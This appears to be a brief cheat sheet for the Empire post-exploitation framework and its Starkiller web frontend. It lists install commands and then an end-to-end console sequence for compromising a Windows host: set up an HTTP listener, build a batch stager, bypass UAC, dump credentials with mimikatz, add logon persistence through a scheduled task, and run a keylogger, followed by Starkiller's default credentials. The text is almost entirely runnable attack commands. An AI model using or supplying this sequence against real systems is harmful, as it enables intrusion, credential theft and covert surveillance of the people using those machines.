Empire [Link] is a post-exploitation for Windows and MacOS from a Linux machine and Starkiller [Link] is a frontend for Empire.
Empire
sudo apt install powershell-empire sudo powershell-empire OR git clone "https://github.com/EmpireProject/Empire.git" sudo ./Empire/setup/install.sh OR docker pull empireproject/empire docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire
Usage:
- help
- listeners
- uselistener [tab]
- uselistener http
- info
- set Name WebServer
- execute
- usestager windows/launcher_bat
- info
- options
- set Listener WebServer
- set StagerRetries 3
- execute
- back
- back
- list
- agents
- rename AAAAAAAA WIN1
- interact WIN1
- help
- info
- sysinfo
- bypassuac WebServer
- exit
- rename BBBBBBBB WIN1ADMIN
- interact WIN1ADMIN
- info
- mimikatz
- creds
- searchmodule NAME
- usemodule [tab]
- usemodule persistence/elevated/schtasks
- info
- set OnLogon True
- set Listener WebServer
- execute
- back
- usemodule collection/keylogger
- execute
- back
- back
- exit
-
# see ~/Empire/downloads/WIN1ADMIN/keystrokes.txt
Starkiller
apt install starkiller
sudo starkiller &
URL: 1337
Default username: empireadmin
Default password: password123